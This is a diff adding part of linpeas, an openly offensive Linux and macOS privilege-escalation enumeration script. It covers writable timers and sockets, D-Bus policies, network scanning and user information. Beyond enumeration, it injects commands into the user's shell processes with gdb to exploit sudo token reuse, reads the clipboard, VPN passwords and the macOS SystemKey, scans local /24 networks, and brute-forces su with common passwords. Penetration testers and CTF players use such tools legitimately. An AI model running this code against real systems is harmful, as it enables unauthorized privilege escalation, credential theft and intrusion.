+print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers"
+printf "%s\n" "$PSTORAGE_TIMER" | while read t; do
+ if ! [ "$IAMROOT" ] && [ -w "$t" ]; then
+ echo "$t" | sed -${E} "s,.*,${SED_RED},g"
+ fi
+ timerbinpaths=$(grep -Po '^Unit=*(.*?$)' $t 2>/dev/null | cut -d '=' -f2)
+ printf "%s\n" "$timerbinpaths" | while read tb; do
+ if [ -w "$tb" ]; then
+ echo "$t timer is calling this writable executable: $tb" | sed "s,writable.*,${SED_RED},g"
+ fi
+ done
+ #relpath="`grep -Po '^Unit=[^/].*' \"$t\" 2>/dev/null`"
+ #for rp in "$relpath"; do
+ # echo "$t is calling a relative path: $rp" | sed "s,relative.*,${SED_RED},g"
+ #done
+done
+echo ""
+
+#-- PSC) .socket files
+#TODO: .socket files in MACOS are folders
+if ! [ "$IAMROOT" ]; then
+ print_2title "Analyzing .socket files"
+ print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets"
+ printf "%s\n" "$PSTORAGE_SOCKET" | while read s; do
+ if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ]; then
+ echo "Writable .socket file: $s" | sed "s,/.*,${SED_RED},g"
+ fi
+ socketsbinpaths=$(grep -Eo '^(Exec).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,')
+ printf "%s\n" "$socketsbinpaths" | while read sb; do
+ if [ -w "$sb" ]; then
+ echo "$s is calling this writable executable: $sb" | sed "s,writable.*,${SED_RED},g"
+ fi
+ done
+ socketslistpaths=$(grep -Eo '^(Listen).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,')
+ printf "%s\n" "$socketslistpaths" | while read sl; do
+ if [ -w "$sl" ]; then
+ echo "$s is calling this writable listener: $sl" | sed "s,writable.*,${SED_RED},g";
+ fi
+ done
+ done
+ echo ""
+
+ print_2title "Unix Sockets Listening"
+ print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets"
+ # Search sockets using netstat and ss
+ unix_scks_list=$(ss -xlp -H state listening 2>/dev/null | grep -Eo "/.* " | cut -d " " -f1)
+ if ! [ "$unix_scks_list" ];then
+ unix_scks_list=$(ss -l -p -A 'unix' 2>/dev/null | grep -Ei "listen|Proc" | grep -Eo "/[a-zA-Z0-9\._/\-]+")
+ fi
+ if ! [ "$unix_scks_list" ];then
+ unix_scks_list=$(netstat -a -p --unix 2>/dev/null | grep -Ei "listen|PID" | grep -Eo "/[a-zA-Z0-9\._/\-]+" | tail -n +2)
+ fi
+
+ # But also search socket files
+ unix_scks_list2=$(find / -type s 2>/dev/null)
+
+ # Detele repeated dockets and check permissions
+ (printf "%s\n" "$unix_scks_list" && printf "%s\n" "$unix_scks_list2") | sort | uniq | while read l; do
+ perms=""
+ if [ -r "$l" ]; then
+ perms="Read "
+ fi
+ if [ -w "$l" ];then
+ perms="${perms}Write"
+ fi
+ if ! [ "$perms" ]; then echo "$l" | sed -${E} "s,$l,${SED_GREEN},g";
+ else
+ echo "$l" | sed -${E} "s,$l,${SED_RED},g"
+ echo " └─(${RED}${perms}${NC})"
+ # Try to contact the socket
+ socketcurl=$(curl --max-time 2 --unix-socket "$s" http:/index 2>/dev/null)
+ if [ $? -eq 0 ]; then
+ owner=$(ls -l "$s" | cut -d ' ' -f 3)
+ echo "Socket $s owned by $owner uses HTTP. Response to /index: (limt 30)" | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g"
+ echo "$socketcurl" | head -n 30
+ fi
+ fi
+ done
+ echo ""
+fi
+
+#-- PSC) Writable and weak policies in D-Bus config files
+print_2title "D-Bus config files"
+print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus"
+if [ "$PSTORAGE_DBUS" ]; then
+ printf "%s\n" "$PSTORAGE_DBUS" | while read d; do
+ for f in $d/*; do
+ if ! [ "$IAMROOT" ] && [ -w "$f" ]; then
+ echo "Writable $f" | sed -${E} "s,.*,${SED_RED},g"
+ fi
+
+ genpol=$(grep "<policy>" "$f" 2>/dev/null)
+ if [ "$genpol" ]; then printf "Weak general policy found on $f ($genpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi
+ #if [ "`grep \"<policy user=\\\"$USER\\\">\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak user policy found on $f () \n" | sed "s,$USER,${SED_RED},g"; fi
+
+ userpol=$(grep "<policy user=" "$f" 2>/dev/null | grep -v "root")
+ if [ "$userpol" ]; then printf "Possible weak user policy found on $f ($userpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi
+ #for g in `groups`; do
+ # if [ "`grep \"<policy group=\\\"$g\\\">\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak group ($g) policy found on $f\n" | sed "s,$g,${SED_RED},g"; fi
+ #done
+ grppol=$(grep "<policy group=" "$f" 2>/dev/null | grep -v "root")
+ if [ "$grppol" ]; then printf "Possible weak user policy found on $f ($grppol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi
+
+ #TODO: identify allows in context="default"
+ done
+ done
+fi
+echo ""
+
+print_2title "D-Bus Service Objects list"
+print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus"
+dbuslist=$(busctl list 2>/dev/null)
+if [ "$dbuslist" ]; then
+ busctl list | while read line; do
+ echo "$line" | sed -${E} "s,$dbuslistG,${SED_GREEN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},";
+ if ! echo "$line" | grep -qE "$dbuslistG"; then
+ srvc_object=$(echo $line | cut -d " " -f1)
+ srvc_object_info=$(busctl status "$srvc_object" 2>/dev/null | grep -E "^UID|^EUID|^OwnerUID" | tr '\n' ' ')
+ if [ "$srvc_object_info" ]; then
+ echo " -- $srvc_object_info" | sed "s,UID=0,${SED_RED},"
+ fi
+ fi
+ done
+else echo_not_found "busctl"
+fi
+
+fi
+echo ''
+echo ''
+if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi
+
+if echo $CHECKS | grep -q network_information; then
+print_title "Network Information"
+###########################################
+#---------) Network Information (---------#
+###########################################
+
+if [ "$MACOS" ]; then
+ print_2title "Network Capabilities"
+ warn_exec system_profiler SPNetworkDataType
+ echo ""
+fi
+
+#-- NI) Hostname, hosts and DNS
+print_2title "Hostname, hosts and DNS"
+cat /etc/hostname /etc/hosts /etc/resolv.conf 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null
+warn_exec dnsdomainname 2>/dev/null
+echo ""
+
+#-- NI) /etc/inetd.conf
+if [ "$EXTRA_CHECKS" ]; then
+ print_2title "Content of /etc/inetd.conf & /etc/xinetd.conf"
+ (cat /etc/inetd.conf /etc/xinetd.conf 2>/dev/null | grep -v "^$" | grep -Ev "\W+\#|^#" 2>/dev/null) || echo_not_found "/etc/inetd.conf"
+ echo ""
+fi
+
+#-- NI) Interfaces
+print_2title "Interfaces"
+cat /etc/networks 2>/dev/null
+(ifconfig || ip a) 2>/dev/null
+echo ""
+
+#-- NI) Neighbours
+if [ "$EXTRA_CHECKS" ]; then
+ print_2title "Networks and neighbours"
+ if [ "$MACOS" ]; then
+ netstat -rn 2>/dev/null
+ else
+ (route || ip n || cat /proc/net/route) 2>/dev/null
+ fi
+ (arp -e || arp -a || cat /proc/net/arp) 2>/dev/null
+ echo ""
+fi
+
+if [ "$MACPEAS" ]; then
+ print_2title "Firewall status"
+ warn_exec system_profiler SPFirewallDataType
+fi
+
+#-- NI) Iptables
+if [ "$EXTRA_CHECKS" ]; then
+ print_2title "Iptables rules"
+ (timeout 1 iptables -L 2>/dev/null; cat /etc/iptables/* | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null) 2>/dev/null || echo_not_found "iptables rules"
+ echo ""
+fi
+
+#-- NI) Ports
+print_2title "Active Ports"
+print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports"
+( (netstat -punta || ss -nltpu || netstat -anv) | grep -i listen) 2>/dev/null | sed -${E} "s,127.0.[0-9]+.[0-9]+|:::|::1:|0\.0\.0\.0,${SED_RED},"
+echo ""
+
+#-- NI) MacOS hardware ports
+if [ "$MACPEAS" ] && [ "$EXTRA_CHECKS" ]; then
+ print_2title "Hardware Ports"
+ networksetup -listallhardwareports
+ echo ""
+
+ print_2title "VLANs"
+ networksetup -listVLANs
+ echo ""
+
+ print_2title "Wifi Info"
+ networksetup -getinfo Wi-Fi
+ echo ""
+
+ print_2title "Check Enabled Proxies"
+ scutil --proxy
+ echo ""
+
+ print_2title "Wifi Proxy URL"
+ networksetup -getautoproxyurl Wi-Fi
+ echo ""
+
+ print_2title "Wifi Web Proxy"
+ networksetup -getwebproxy Wi-Fi
+ echo ""
+
+ print_2title "Wifi FTP Proxy"
+ networksetup -getftpproxy Wi-Fi
+ echo ""
+fi
+
+#-- NI) tcpdump
+print_2title "Can I sniff with tcpdump?"
+timeout 1 tcpdump >/dev/null 2>&1
+if [ $? -eq 124 ]; then #If 124, then timed out == It worked
+ print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sniffing"
+ echo "You can sniff with tcpdump!" | sed -${E} "s,.*,${SED_RED},"
+else echo_no
+fi
+echo ""
+
+#-- NI) Internet access
+if [ "$AUTO_NETWORK_SCAN" ] && [ "$TIMEOUT" ] && [ -f "/bin/bash" ]; then
+ print_2title "Internet Access?"
+ check_tcp_80 2>/dev/null &
+ check_tcp_443 2>/dev/null &
+ check_icmp 2>/dev/null &
+ check_dns 2>/dev/null &
+ wait
+ echo ""
+fi
+
+if [ "$AUTO_NETWORK_SCAN" ]; then
+ if ! [ "$FOUND_NC" ] && ! [ "$FOUND_BASH" ]; then
+ printf $RED"[-] $SCAN_BAN_BAD\n$NC"
+ echo "The network is not going to be scanned..."
+
+ elif ! [ "$(command -v ifconfig)" ] && ! [ "$(command -v ip a)" ]; then
+ printf $RED"[-] No ifconfig or ip commands, cannot find local ips\n$NC"
+ echo "The network is not going to be scanned..."
+
+ else
+ print_2title "Scanning local networks (using /24)"
+
+ if ! [ "$PING" ] && ! [ "$FPING" ]; then
+ printf $RED"[-] $DISCOVER_BAN_BAD\n$NC"
+ fi
+
+ select_nc
+ local_ips=$( (ip a 2>/dev/null || ifconfig) | grep -Eo 'inet[^6]\S+[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | awk '{print $2}' | grep -E "^10\.|^172\.|^192\.168\.|^169\.254\.")
+ printf "%s\n" "$local_ips" | while read local_ip; do
+ if ! [ -z "$local_ip" ]; then
+ print_3title "Discovering hosts in $local_ip/24"
+
+ if [ "$PING" ] || [ "$FPING" ]; then
+ discover_network "$local_ip/24" | sed 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g' | grep -A 256 "Network Discovery" | grep -v "Network Discovery" | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' > $Wfolder/.ips.tmp
+ fi
+
+ discovery_port_scan "$local_ip/24" 22 | sed 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g' | grep -A 256 "Ports going to be scanned" | grep -v "Ports going to be scanned" | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' >> $Wfolder/.ips.tmp
+
+ sort $Wfolder/.ips.tmp | uniq > $Wfolder/.ips
+ rm $Wfolder/.ips.tmp 2>/dev/null
+
+ while read disc_ip; do
+ me=""
+ if [ "$disc_ip" = "$local_ip" ]; then
+ me=" (local)"
+ fi
+
+ echo "Scanning top ports of ${disc_ip}${me}"
+ (tcp_port_scan "$disc_ip" "" | grep -A 1000 "Ports going to be scanned" | grep -v "Ports going to be scanned" | sort | uniq) 2>/dev/null
+ echo ""
+ done < $Wfolder/.ips
+
+ rm $Wfolder/.ips 2>/dev/null
+ echo ""
+ fi
+ done
+ fi
+fi
+
+if [ "$MACOS" ]; then
+ print_2title "Any MacOS Sharing Service Enabled?"
+ rmMgmt=$(netstat -na | grep LISTEN | grep tcp46 | grep "*.3283" | wc -l);
+ scrShrng=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.5900" | wc -l);
+ flShrng=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep -E "\*.88|\*.445|\*.548" | wc -l);
+ rLgn=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.22" | wc -l);
+ rAE=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.3031" | wc -l);
+ bmM=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.4488" | wc -l);
+ printf "\nThe following services are OFF if '0', or ON otherwise:\nScreen Sharing: %s\nFile Sharing: %s\nRemote Login: %s\nRemote Mgmt: %s\nRemote Apple Events: %s\nBack to My Mac: %s\n\n" "$scrShrng" "$flShrng" "$rLgn" "$rmMgmt" "$rAE" "$bmM";
+ echo ""
+ print_2title "VPN Creds"
+ system_profiler SPNetworkLocationDataType | grep -A 5 -B 7 ": Password" | sed -${E} "s,Password|Authorization Name.*,${SED_RED},"
+ echo ""
+
+ if [ "$EXTRA_CHECKS" ]; then
+ print_2title "Bluetooth Info"
+ warn_exec system_profiler SPBluetoothDataType
+ echo ""
+
+ print_2title "Ethernet Info"
+ warn_exec system_profiler SPEthernetDataType
+ echo ""
+
+ print_2title "USB Info"
+ warn_exec system_profiler SPUSBDataType
+ echo ""
+ fi
+fi
+
+fi
+echo ''
+echo ''
+if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi
+
+if echo $CHECKS | grep -q users_information; then
+print_title "Users Information"
+###########################################
+#----------) Users Information (----------#
+###########################################
+
+#-- UI) My user
+print_2title "My user"
+print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#users"
+(id || (whoami && groups)) 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g"
+echo ""
+
+if [ "$MACPEAS" ];then
+ print_2title "Current user Login and Logout hooks"
+ defaults read $HOME/Library/Preferences/com.apple.loginwindow.plist 2>/dev/null | grep -e "Hook"
+ echo ""
+
+ print_2title "All Login and Logout hooks"
+ defaults read /Users/*/Library/Preferences/com.apple.loginwindow.plist 2>/dev/null | grep -e "Hook"
+ defaults read /private/var/root/Library/Preferences/com.apple.loginwindow.plist
+ echo ""
+
+ print_2title "Keychains"
+ print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#chainbreaker"
+ security list-keychains
+ echo ""
+
+ print_2title "SystemKey"
+ ls -l /var/db/SystemKey
+ if [ -r "/var/db/SystemKey" ]; then
+ echo "You can read /var/db/SystemKey" | sed -${E} "s,.*,${SED_RED_YELLOW},";
+ hexdump -s 8 -n 24 -e '1/1 "%.2x"' /var/db/SystemKey | sed -${E} "s,.*,${SED_RED_YELLOW},";
+ fi
+ echo ""
+fi
+
+#-- UI) PGP keys?
+print_2title "Do I have PGP keys?"
+command -v gpg 2>/dev/null || echo_not_found "gpg"
+gpg --list-keys 2>/dev/null
+command -v netpgpkeys 2>/dev/null || echo_not_found "netpgpkeys"
+netpgpkeys --list-keys 2>/dev/null
+command -v netpgp 2>/dev/null || echo_not_found "netpgp"
+echo ""
+
+#-- UI) Clipboard and highlighted text
+if [ "$(command -v xclip 2>/dev/null)" ] || [ "$(command -v xsel 2>/dev/null)" ] || [ "$(command -v pbpaste 2>/dev/null)" ] || [ "$DEBUG" ]; then
+ print_2title "Clipboard or highlighted text?"
+ if [ "$(command -v xclip 2>/dev/null)" ]; then
+ echo "Clipboard: "$(xclip -o -selection clipboard 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED},"
+ echo "Highlighted text: "$(xclip -o 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED},"
+ elif [ "$(command -v xsel 2>/dev/null)" ]; then
+ echo "Clipboard: "$(xsel -ob 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED},"
+ echo "Highlighted text: "$(xsel -o 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED},"
+ elif [ "$(command -v pbpaste 2>/dev/null)" ]; then
+ echo "Clipboard: "$(pbpaste) | sed -${E} "s,$pwd_inside_history,${SED_RED},"
+ else echo_not_found "xsel and xclip"
+ fi
+ echo ""
+fi
+
+#-- UI) Sudo -l
+print_2title "Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d"
+print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid"
+(echo '' | timeout 1 sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,\!root,${SED_RED},") 2>/dev/null || echo_not_found "sudo"
+if [ "$PASSWORD" ]; then
+ (echo "$PASSWORD" | timeout 1 sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed -${E} "s,$sudoB,${SED_RED},g") 2>/dev/null || echo_not_found "sudo"
+fi
+( grep -Iv "^$" cat /etc/sudoers | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" ) 2>/dev/null || echo_not_found "/etc/sudoers"
+if ! [ "$IAMROOT" ] && [ -w '/etc/sudoers.d/' ]; then
+ echo "You can create a file in /etc/sudoers.d/ and escalate privileges" | sed -${E} "s,.*,${SED_RED_YELLOW},"
+fi
+for filename in '/etc/sudoers.d/*'; do
+ if [ -r "$filename" ]; then
+ echo "Sudoers file: $filename is readable" | sed -${E} "s,.*,${SED_RED},g"
+ grep -Iv "^$" "$filename" | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g"
+ fi
+done
+echo ""
+
+#-- UI) Sudo tokens
+print_2title "Checking sudo tokens"
+print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens"
+ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)"
+if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then echo "ptrace protection is disabled (0)" | sed "s,is disabled,${SED_RED},g";
+else echo "ptrace protection is enabled ($ptrace_scope)" | sed "s,is enabled,${SED_GREEN},g";
+fi
+is_gdb="$(command -v gdb 2>/dev/null)"
+if [ "$is_gdb" ]; then echo "gdb was found in PATH" | sed -${E} "s,.*,${SED_RED},g";
+else echo "gdb wasn't found in PATH, this might still be vulnerable but linpeas won't be able to check it" | sed "s,gdb,${SED_GREEN},g";
+fi
+if [ ! "$SUPERFAST" ] && [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ] && [ "$is_gdb" ]; then
+ echo "Checking for sudo tokens in other shells owned by current user"
+ for pid in $(pgrep '^(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$' -u "$(id -u)" 2>/dev/null | grep -v "^$$\$"); do
+ echo "Injecting process $pid -> "$(cat "/proc/$pid/comm" 2>/dev/null)
+ echo 'call system("echo | sudo -S touch /tmp/shrndom32r2r >/dev/null 2>&1 && echo | sudo -S chmod 777 /tmp/shrndom32r2r >/dev/null 2>&1")' | gdb -q -n -p "$pid" >/dev/null 2>&1
+ if [ -f "/tmp/shrndom32r2r" ]; then
+ echo "Sudo token reuse exploit worked with pid:$pid! (see link)" | sed -${E} "s,.*,${SED_RED_YELLOW},";
+ break
+ fi
+ done
+ if [ -f "/tmp/shrndom32r2r" ]; then
+ rm -f /tmp/shrndom32r2r 2>/dev/null
+ else echo "The escalation didn't work... (try again later?)"
+ fi
+fi
+echo ""
+
+#-- UI) Doas
+if [ -f "/etc/doas.conf" ] || [ "$DEBUG" ]; then
+ print_2title "Checking doas.conf"
+ doas_dir_name=$(dirname "$(command -v doas)" 2>/dev/null)
+ if [ "$(cat /etc/doas.conf $doas_dir_name/doas.conf $doas_dir_name/../etc/doas.conf $doas_dir_name/etc/doas.conf 2>/dev/null)" ]; then
+ cat /etc/doas.conf "$doas_dir_name/doas.conf" "$doas_dir_name/../etc/doas.conf" "$doas_dir_name/etc/doas.conf" 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_RED}," | sed "s,root,${SED_RED}," | sed "s,nopass,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,$USER,${SED_RED_YELLOW},"
+ else echo_not_found "doas.conf"
+ fi
+ echo ""
+fi
+
+#-- UI) Pkexec policy
+print_2title "Checking Pkexec policy"
+print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe#pe-method-2"
+(cat /etc/polkit-1/localauthority.conf.d/* 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED}," | sed -${E} "s,$groupsVB,${SED_RED}," | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,$USER,${SED_RED_YELLOW}," | sed -${E} "s,$Groups,${SED_RED_YELLOW},") || echo_not_found "/etc/polkit-1/localauthority.conf.d"
+echo ""
+
+#-- UI) Superusers
+print_2title "Superusers"
+awk -F: '($3 == "0") {print}' /etc/passwd 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED_YELLOW}," | sed "s,root,${SED_RED},"
+echo ""
+
+#-- UI) Users with console
+print_2title "Users with console"
+if [ "$MACPEAS" ]; then
+ dscl . list /Users | while read uname; do
+ ushell=$(dscl . -read "/Users/$uname" UserShell | cut -d " " -f2)
+ if grep -q "$ushell" /etc/shells; then #Shell user
+ dscl . -read "/Users/$uname" UserShell RealName RecordName Password NFSHomeDirectory 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
+ echo ""
+ fi
+ done
+else
+ no_shells=$(grep -Ev "sh$" /etc/passwd 2>/dev/null | cut -d ':' -f 7 | sort | uniq)
+ unexpected_shells=""
+ printf "%s\n" "$no_shells" | while read f; do
+ if $f -c 'whoami' 2>/dev/null | grep -q "$USER"; then
+ unexpected_shells="$f\n$unexpected_shells"
+ fi
+ done
+ grep "sh$" /etc/passwd 2>/dev/null | sort | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
+ if [ "$unexpected_shells" ]; then
+ printf "%s" "These unexpected binaries are acting like shells:\n$unexpected_shells" | sed -${E} "s,/.*,${SED_RED},g"
+ echo "Unexpected users with shells:"
+ printf "%s\n" "$unexpected_shells" | while read f; do
+ if [ "$f" ]; then
+ grep -E "${f}$" /etc/passwd | sed -${E} "s,/.*,${SED_RED},g"
+ fi
+ done
+ fi
+fi
+echo ""
+
+#-- UI) All users & groups
+print_2title "All users & groups"
+if [ "$MACPEAS" ]; then
+ dscl . list /Users | while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g"
+else
+ cut -d":" -f1 /etc/passwd 2>/dev/null| while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g"
+fi
+echo ""
+
+#-- UI) Login now
+print_2title "Login now"
+(w || who || finger || users) 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
+echo ""
+
+#-- UI) Last logons
+print_2title "Last logons"
+(last -Faiw || last) 2>/dev/null | tail | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_RED}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
+echo ""
+
+#-- UI) Login info
+print_2title "Last time logon each user"
+lastlog 2>/dev/null | grep -v "Never" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
+
+EXISTS_FINGER="$(command -v finger 2>/dev/null)"
+if [ "$MACPEAS" ] && [ "$EXISTS_FINGER" ]; then
+ dscl . list /Users | while read uname; do
+ ushell=$(dscl . -read "/Users/$uname" UserShell | cut -d " " -f2)
+ if grep -q "$ushell" /etc/shells; then #Shell user
+ finger "$uname" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
+ echo ""
+ fi
+ done
+fi
+echo ""
+
+#-- UI) Password policy
+if [ "$EXTRA_CHECKS" ]; then
+ print_2title "Password policy"
+ grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs 2>/dev/null || echo_not_found "/etc/login.defs"
+ echo ""
+
+ if [ "$MACPEAS" ]; then
+ print_2title "Relevant last user info and user configs"
+ defaults read /Library/Preferences/com.apple.loginwindow.plist 2>/dev/null
+ echo ""
+
+ print_2title "Guest user status"
+ sysadminctl -afpGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN},"
+ sysadminctl -guestAccount status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN},"
+ sysadminctl -smbGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN},"
+ echo ""
+ fi
+fi
+
+#-- UI) Brute su
+EXISTS_SUDO="$(command -v sudo 2>/dev/null)"
+if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ] && ! [ "$IAMROOT" ] && [ "$EXISTS_SUDO" ]; then
+ print_2title "Testing 'su' as other users with shell using as passwords: null pwd, the username and top2000pwds\n"$NC
+ POSSIBE_SU_BRUTE=$(check_if_su_brute);
+ if [ "$POSSIBE_SU_BRUTE" ]; then
+ SHELLUSERS=$(cat /etc/passwd 2>/dev/null | grep -i "sh$" | cut -d ":" -f 1)
